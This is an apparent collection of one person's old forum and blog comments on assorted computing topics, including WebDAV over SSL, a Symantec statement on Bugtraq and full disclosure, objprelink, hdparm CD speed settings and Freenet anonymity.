I think it's an old unix trick.
About a week ago I put up a new link to a random timetabling iCal outputting python script.
I was quite surprised at how quickly googlebot started looking at it - a lot more than other pages, and without many links at all. Whether it's related to a hypothetical gCalendar I don't know - perhaps they just know that calendars might update regularly?
Is this the first published online usage of the term in english? Google thinks so.

Everything is SSL, including WebDAV (for your iDisk & iSync).
As far as I can tell, the actual WebDAV isn't SSL. The authentication seems to be, but not the actual remove webdav mount (the webdavfs package at http://opensource.apple.com/ seems to confirm this). Could be wrong, but I couldn't see any evidence of it.
From this thread on Sept 12 (love the slow Australian IT press):
I am posting this In reference to the recent Wired article which Richard
Smith posted to this list. Symantec fully supports information sharing on
threats and vulnerabilities and believes it is an important tool for
consumers and IT professionals to gain a measure of early warning of
potential attacks.
The Bugtraq mailing list, maintained as an independent entity under the
SecurityFocus brand, remains one of the most respected and open sources for
security information and early alerting by security professionals worldwide
and full disclosure is *critical to the integrity of the Bugtraq
community*.
With regards to cyber crime we need more and higher quality resources for
law enforcement to work on computer forensics, and we need cooperation from
government and industry to assist prosecutors in building cases against
attackers.
Given the increase in the number of security threats and the availability
of online tools we also believe that the industry should focus on training
and educating todaya(TM)s youth about the ethics of computer crime and its
affects and impact on victims.
These are not simply my words but also an official Symantec statement.
Cheers,

That would have to be probably the best bit of writing i've seen on slashdot for a while. I got strange deja vu to some other book i've read (no, not copied text, just the idea), but can't remember the title. Oh well.
That is indeed what should actually be done. Rather than looking at computer UIs in terms of being a metaphor for something else, why can't the computer's interface simply exist?
As an analogy that someone else suggested once (iirc on/. or kuro5hin), we don't drive a car using a metaphor for something else, we simply use the car's controls themselves, having learned.
The actual reason that they were hunted out was that they were supposedly killing farmers' sheep, so a bounty was put on them. It was fairly successful that.
I compiled it all with objprelink a few months ago, and it all worked nicely, and seemed to improve in speed (but that's always subjective and hard to tell).
However I tried compiling again a week ago, and everything segfaulted. Reason being that I had apt-get updated to more recent g++ libc etc from woody.
However someone did mention that recent binutils includes something which attempts to do similar, but in a more "proper" way, so supposedly there isn't really a need for objprelink...
Anyone who knows more than me want to comment about it?
Surely _someone_ out there is going to develop a windows (and linux, and *bsd etc) interface for the iPod, so in this way, Apple can avoid the hassles of making (and supporting) software for the other OSes.
As well as promoting their computer hardware, and churning out damn cool products.
I tried some similar type stuff (might have been same stuff, dunno), and it worked very nicely. The only problem is most glues seem to peel off the inside of the case. What'd you use for it?
Found something nifty reading linux kernel mailing list the other day...
hdparm has a -E option, which sets the speed of your cd drive. Its great to quieten down a bit, esp for listening to audio or mp3 cds.
I'm also in Western Australia, but I don't recall ever even hearing about net censorship laws here... Got any pointers where I could find out about them?
AFAIK, gnutella doesn't have (currently at least) anonymous transfers, it is a straight point to point connection.
Freenet does allow for anonymity of certainly the provider, and possibly the person downloading as well. The main problem with Freenet is searching for files, which is near non-existant. Basically, you need to know the url to find out if a file exists. This leads to problems like with DeCSS and 2600, where sites are prosecuted simply for providing those URLs.
Perhaps if ALPINE could be combined with Freenet to provide improved searching, it could be interesting.

Take a look at the -i option in the bash manpage, iirc.

so you're getting a 4ld, not a 3ld.
Read the article, it says that office lighting is 3x brighter than is needed by it.... Of course they could be making it up as they go along....

I have no probs using wildcards (*.htm etc) for openssh 2.3 server or client.
Perhaps we should all set up a filter to look for script tags in messages and tag them so they can be dealt with? Would be a wise move IMO.
Sounds just like the end aims of SDMI...
